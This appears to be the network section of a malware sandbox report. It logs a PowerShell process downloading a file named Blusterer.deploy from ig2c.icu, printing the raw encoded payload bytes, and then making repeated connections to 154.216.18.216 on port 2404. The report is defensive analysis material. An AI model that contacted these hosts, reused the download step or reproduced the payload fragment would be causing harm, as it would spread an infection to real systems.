                                                  Dec 17, 2024 08:30:18.025453091 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.026928902 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.029186964 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.029239893 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.029253960 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.029906988 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.037086010 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.038924932 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.038950920 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.039069891 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.044930935 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.050028086 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.050064087 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.050918102 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.052680016 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.052747965 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.060462952 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.060570955 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.060595036 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.060667992 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.068293095 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.068377972 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.068393946 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.068442106 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.076095104 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.078015089 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.078053951 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.078100920 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.083853960 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.086961031 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.091943979 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.092974901 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.092998028 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.093071938 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.099489927 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.099586964 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.099601984 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.099904060 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.217570066 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.217638969 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.217665911 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.217715979 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.221350908 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.221985102 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.222004890 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.222048998 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.229149103 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.229224920 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.229249954 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.229664087 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.237088919 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.238424063 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.238435984 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.239212990 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.244405031 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.244476080 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.251719952 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.253541946 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.258863926 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.258929968 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.273613930 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.273679018 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.280742884 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.281907082 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.288093090 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.288162947 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.302469015 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.302539110 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.317032099 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.317095041 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.324433088 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.324496031 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.413618088 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.413836002 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.423011065 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.423084021 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.436990976 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.437138081 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.442161083 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.442280054 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.451766014 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.451917887 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.454641104 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.454910994 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.464095116 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.464199066 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.473541975 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.473665953 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.482938051 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.483092070 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.487871885 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.487979889 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.497473955 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.497545958 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.509397984 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.509500027 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.514357090 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.514465094 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.521012068 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.521081924 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.530432940 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.530519962 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.602018118 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.602114916 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.606201887 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.606270075 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.613091946 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.613152981 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.616550922 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.616615057 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.623441935 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.623508930 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.628974915 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.629035950 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.632560968 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.632663965 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.638001919 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.638063908 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.643770933 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.643824100 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.649593115 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.649643898 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.652425051 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.652493000 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.657815933 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.657865047 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.660805941 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.660860062 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.666028976 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.666086912 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.671428919 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.671494961 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.676690102 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.676745892 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.680661917 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.680710077 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.684860945 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.684920073 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.697263956 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.697324038 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.697360039 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.697371006 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.697393894 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.697412014 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.716005087 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.716028929 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.716104984 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.716109991 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.717421055 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.735354900 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.735378027 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.735460043 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.735483885 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.738908052 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.804210901 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.804241896 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.804332018 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.804347038 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.804372072 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.804387093 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.814840078 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.814865112 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.814904928 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.814935923 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.814954042 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.814975023 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.826647043 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.826678038 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.826749086 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.826776981 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.826936960 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.830805063 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.832808971 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.832876921 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.832897902 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.832942963 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.842896938 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.842921019 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.842976093 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.842999935 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.843015909 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.843038082 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.851978064 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.852011919 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.852051020 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.852077007 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.852094889 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.852116108 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.856324911 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.856385946 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.856408119 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.856448889 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.863209009 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.863226891 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.863264084 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.863286972 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.863323927 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.863331079 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.986159086 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.986187935 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.986253023 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.986280918 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.986299992 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.986315966 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.991889954 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.991919041 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.991995096 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.992011070 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.992049932 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.998092890 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.998115063 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.998161077 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.998193026 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:18.998204947 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:18.998224020 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.000732899 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.000803947 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.000813007 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.000844955 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.006539106 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.006583929 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.006623030 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.006638050 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.006649971 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.006671906 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.013024092 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.013048887 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.013108015 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.013120890 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.013153076 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.013163090 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.015557051 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.015626907 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.015635967 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.015669107 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.021722078 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.021750927 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.021851063 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.021861076 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.021899939 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.025300026 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.025382996 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.025391102 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.025402069 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:19.025424957 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.025450945 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.045975924 CET49815443192.168.2.9172.67.210.11
                                                  Dec 17, 2024 08:30:19.046005011 CET44349815172.67.210.11192.168.2.9
                                                  Dec 17, 2024 08:30:20.228948116 CET498262404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:30:20.348822117 CET240449826154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:30:20.350979090 CET498262404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:30:20.355374098 CET498262404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:30:20.475142002 CET240449826154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:30:42.264858007 CET240449826154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:30:42.265023947 CET498262404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:30:42.265094995 CET498262404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:30:42.384771109 CET240449826154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:30:43.273489952 CET498772404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:30:43.393872976 CET240449877154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:30:43.394012928 CET498772404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:30:43.397583961 CET498772404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:30:43.517416954 CET240449877154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:31:05.313378096 CET240449877154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:31:05.313530922 CET498772404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:31:05.313617945 CET498772404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:31:05.433506966 CET240449877154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:31:06.320219994 CET499252404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:31:06.440059900 CET240449925154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:31:06.440192938 CET499252404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:31:06.443770885 CET499252404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:31:06.563616037 CET240449925154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:31:28.343592882 CET240449925154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:31:28.343679905 CET499252404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:31:28.343727112 CET499252404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:31:28.463541985 CET240449925154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:31:29.351438046 CET499732404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:31:29.471453905 CET240449973154.216.18.216192.168.2.9
                                                  Dec 17, 2024 08:31:29.471540928 CET499732404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:31:29.475155115 CET499732404192.168.2.9154.216.18.216
                                                  Dec 17, 2024 08:31:29.595041990 CET240449973154.216.18.216192.168.2.9

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Dec 17, 2024 08:29:28.317564964 CET5159153192.168.2.91.1.1.1
                                                  Dec 17, 2024 08:29:28.710899115 CET53515911.1.1.1192.168.2.9

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Dec 17, 2024 08:29:28.317564964 CET192.168.2.91.1.1.10xb63eStandard query (0)ig2c.icuA (IP address)IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Dec 17, 2024 08:29:22.320913076 CET1.1.1.1192.168.2.90x21f5No error (0)shed.dual-low.s-part-0035.t-0009.t-msedge.nets-part-0035.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                  Dec 17, 2024 08:29:22.320913076 CET1.1.1.1192.168.2.90x21f5No error (0)s-part-0035.t-0009.t-msedge.net13.107.246.63A (IP address)IN (0x0001)false
                                                  Dec 17, 2024 08:29:28.710899115 CET1.1.1.1192.168.2.90xb63eNo error (0)ig2c.icu172.67.210.11A (IP address)IN (0x0001)false
                                                  Dec 17, 2024 08:29:28.710899115 CET1.1.1.1192.168.2.90xb63eNo error (0)ig2c.icu104.21.50.198A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • ig2c.icu

                                                  HTTPS Proxied Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.949717172.67.210.114437536C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                  TimestampBytes transferredDirectionData
                                                  2024-12-17 07:29:29 UTC177OUTGET /ZtySvRyz/Blusterer.deploy HTTP/1.1
                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                  Host: ig2c.icu
                                                  Connection: Keep-Alive
                                                  2024-12-17 07:29:31 UTC782INHTTP/1.1 200 OK
                                                  Date: Tue, 17 Dec 2024 07:29:31 GMT
                                                  Content-Type: application/octet-stream
                                                  Transfer-Encoding: chunked
                                                  Connection: close
                                                  cf-cache-status: DYNAMIC
                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=I%2BQ%2BhHDyotjzK4mgqoOherJLVcOCSQdmzd%2FMWrEwz7YBgBhCYVQduPnhdcZwMfFR2H8v559gZ4B1eaYjlRPZsHccE63ziNh9HgHdnFchpBk49cHyrmLXDdhGLQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                  Server: cloudflare
                                                  CF-RAY: 8f3533d3f862de9a-EWR
                                                  alt-svc: h3=":443"; ma=86400
                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1490&min_rtt=1490&rtt_var=560&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2813&recv_bytes=791&delivery_rate=1950567&cwnd=209&unsent_bytes=0&cid=6e28f2e5ef0c4298&ts=1227&x=0"
                                                  2024-12-17 07:29:31 UTC1369INData Raw: 62 34 61 0d 0a 36 77 4c 62 67 6e 45 42 6d 37 74 6f 2b 78 6b 41 63 51 47 62 63 51 47 62 41 31 77 6b 42 4f 73 43 33 67 7a 72 41 6f 38 69 75 55 37 6e 52 56 68 78 41 5a 74 78 41 5a 75 42 38 51 79 51 4e 76 76 72 41 76 43 74 36 77 4c 48 72 49 48 78 51 6e 64 7a 6f 33 45 42 6d 2b 73 43 42 55 42 78 41 5a 76 72 41 68 45 4e 75 76 44 64 32 74 31 78 41 5a 74 78 41 5a 76 72 41 67 38 2f 36 77 4c 68 73 44 48 4b 63 51 47 62 36 77 4b 35 69 34 6b 55 43 2b 73 43 5a 68 74 78 41 5a 76 52 34 6e 45 42 6d 2b 73 43 48 35 36 44 77 51 54 72 41 6d 4f 38 63 51 47 62 67 66 6c 59 4e 31 51 43 66 4d 70 78 41 5a 74 78 41 5a 75 4c 52 43 51 45 63 51 47 62 63 51 47 62 69 63 50 72 41 67 45 4e 63 51 47 62 67 63 50 4c 73 6a 49 42 63 51 47 62 36 77 49 72 73 4c 71 4a 73 61 69 38 63 51 47 62 36 77
                                                  Data Ascii: b4a6wLbgnEBm7to+xkAcQGbcQGbA1wkBOsC3gzrAo8iuU7nRVhxAZtxAZuB8QyQNvvrAvCt6wLHrIHxQndzo3EBm+sCBUBxAZvrAhENuvDd2t1xAZtxAZvrAg8/6wLhsDHKcQGb6wK5i4kUC+sCZhtxAZvR4nEBm+sCH56DwQTrAmO8cQGbgflYN1QCfMpxAZtxAZuLRCQEcQGbcQGbicPrAgENcQGbgcPLsjIBcQGb6wIrsLqJsai8cQGb6w
